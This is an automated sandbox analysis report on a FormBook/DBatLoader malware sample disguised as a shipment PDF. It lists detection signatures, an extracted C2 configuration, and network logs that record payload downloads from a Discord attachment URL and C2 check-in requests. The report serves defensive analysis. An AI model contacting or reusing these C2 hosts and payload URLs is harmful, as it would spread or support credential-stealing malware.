Windows Analysis Report Original Shipment Doc Ref 2853801324189923,PDF.exe

Overview

General Information

Sample Name:	Original Shipment Doc Ref 2853801324189923,PDF.exe
Analysis ID:	502359
MD5:	e954c3d029b943b054fceb27e5e24d2d
SHA1:	927f6633500965f008ab556a0c1004c095e004ee
SHA256:	a0703367806de16bac9c75c016780c0bf3b1d8c21cf7f51b6a47b6a1aba74999
Tags:	exeXloader
Infos:
Most interesting Screenshot:

Detection

DBatLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected DBatLoader

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Sigma detected: Suspect Svchost Activity

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Uses netsh to modify the Windows network and firewall settings

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Sigma detected: Suspicious Svchost Process

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Creates processes with suspicious names

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.lnvietnam.online/epns/"], "decoy": ["mmfaccao.com", "blttsperma.quest", "946abe.net", "indispensablehands.com", "jkformationfrance.com", "phonerepaire.com", "lienquan-trian.com", "youkuti.com", "empowermindbodystudios.com", "seunicapf.com", "fk-link.xyz", "kunai.tech", "difficultbutdoablebrand.com", "ejworkspace.com", "teracorp.biz", "thekids.today", "quintaalentejana.com", "annaviruksham.com", "jshengrong.com", "nsmetalmakina.xyz", "hentainftd.com", "alphabet-chicken-farms.com", "erotikchat.red", "skintipsllc.com", "expressofertachegou.com", "ygraeriotexniki.com", "thesidehustler.net", "visionries.com", "deployinghigh.com", "havana-smile.com", "exclusivegift7.com", "ephraimhomedeals.com", "westquartier.com", "kiingear.com", "officecom-myaccount.com", "lemomentconcept.com", "royalteacherclass.com", "alltart.com", "hustlershandbook.biz", "mxpvlv.biz", "canalcorporate.com", "carcity.toys", "k6tkuwrnjake.biz", "acrobike69.com", "4000518883.com", "katia-magnetisme.com", "shiningproent.com", "ikmbc-b02.com", "thoughtsbig.com", "baba.clinic", "blazestead.com", "12monthmillionairetraining.com", "goodtasteonline.com", "nokushop.com", "teneses.com", "215oldtoby.com", "pampelina.com", "eimzaizmir.com", "newnetteline.com", "discovertexasbeaches.com", "farrukhportfolio.website", "bombers.xyz", "melissacarbonell.group", "5402506.win"]}

Yara detected FormBook

Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: Original Shipment Doc Ref 2853801324189923,PDF.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe

Avira: detection malicious, Label: HEUR/AGEN.1103161

Antivirus or Machine Learning detection for unpacked file

Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.2.Nyedvqj.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.Nyedvqj.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.1.Nyedvqj.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.1.Nyedvqj.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49760 version: TLS 1.2

Source:	Binary string: cmmon32.pdb source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
Source:	Binary string: netsh.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.376044686.0000000000B60000.00000040.00000001.sdmp, Nyedvqj.exe, 00000011.00000002.376043225.00000000009B0000.00000040.00000001.sdmp, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, Nyedvqj.exe, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp
Source:	Binary string: svchost.pdbUGP source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 4x nop then pop esi	11_2_0041582C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 4x nop then pop edi	11_2_004162E7
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 4x nop then pop ebx	11_2_00406ABF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 4x nop then pop edi	11_2_00415677
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 4x nop then pop esi	17_2_0041582C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 4x nop then pop edi	17_2_004162E7
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 4x nop then pop ebx	17_2_00406ABF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 4x nop then pop edi	17_2_00415677

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 35.209.104.90:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 35.209.104.90:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 35.209.104.90:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49809 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49809 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49809 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.goodtasteonline.com
Source: C:\Windows\explorer.exe	Domain query: www.thesidehustler.net
Source: C:\Windows\explorer.exe	Network Connect: 37.123.118.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mmfaccao.com
Source: C:\Windows\explorer.exe	Domain query: www.lnvietnam.online
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.209.104.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.223.115.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.blttsperma.quest
Source: C:\Windows\explorer.exe	Domain query: www.bombers.xyz
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.jkformationfrance.com
Source: C:\Windows\explorer.exe	Domain query: www.alltart.com

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.bombers.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.lnvietnam.online/epns/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /epns/?5jz=Qaf9b58Tbh8Z520YhGjeYYsoKHR90rBEG3FUA1hNyjMgDr+YB08dwxAknUVnxeGDxphK&wVzHJ=BRWdQ6 HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+f HTTP/1.1Host: www.jkformationfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ6 HTTP/1.1Host: www.bombers.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VB HTTP/1.1Host: www.goodtasteonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ6 HTTP/1.1Host: www.alltart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk HTTP/1.1Host: www.thesidehustler.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ6 HTTP/1.1Host: www.eimzaizmir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.10.3 (Ubuntu)Date: Wed, 13 Oct 2021 18:37:08 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:37:41 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:37:52 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/a
Source: Nyedvqj.exe, 0000000C.00000002.322309602.00000000007DB000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000C.00000002.323669387.0000000002CE8000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000E.00000002.342777768.0000000002E18000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqe
Source: Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/m
Source: netsh.exe, 00000014.00000002.539177729.0000000003EF2000.00000004.00020000.sdmp	String found in binary or memory: https://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/l

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=Qaf9b58Tbh8Z520YhGjeYYsoKHR90rBEG3FUA1hNyjMgDr+YB08dwxAknUVnxeGDxphK&wVzHJ=BRWdQ6 HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+f HTTP/1.1Host: www.jkformationfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ6 HTTP/1.1Host: www.bombers.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VB HTTP/1.1Host: www.goodtasteonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ6 HTTP/1.1Host: www.alltart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk HTTP/1.1Host: www.thesidehustler.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ6 HTTP/1.1Host: www.eimzaizmir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49760 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
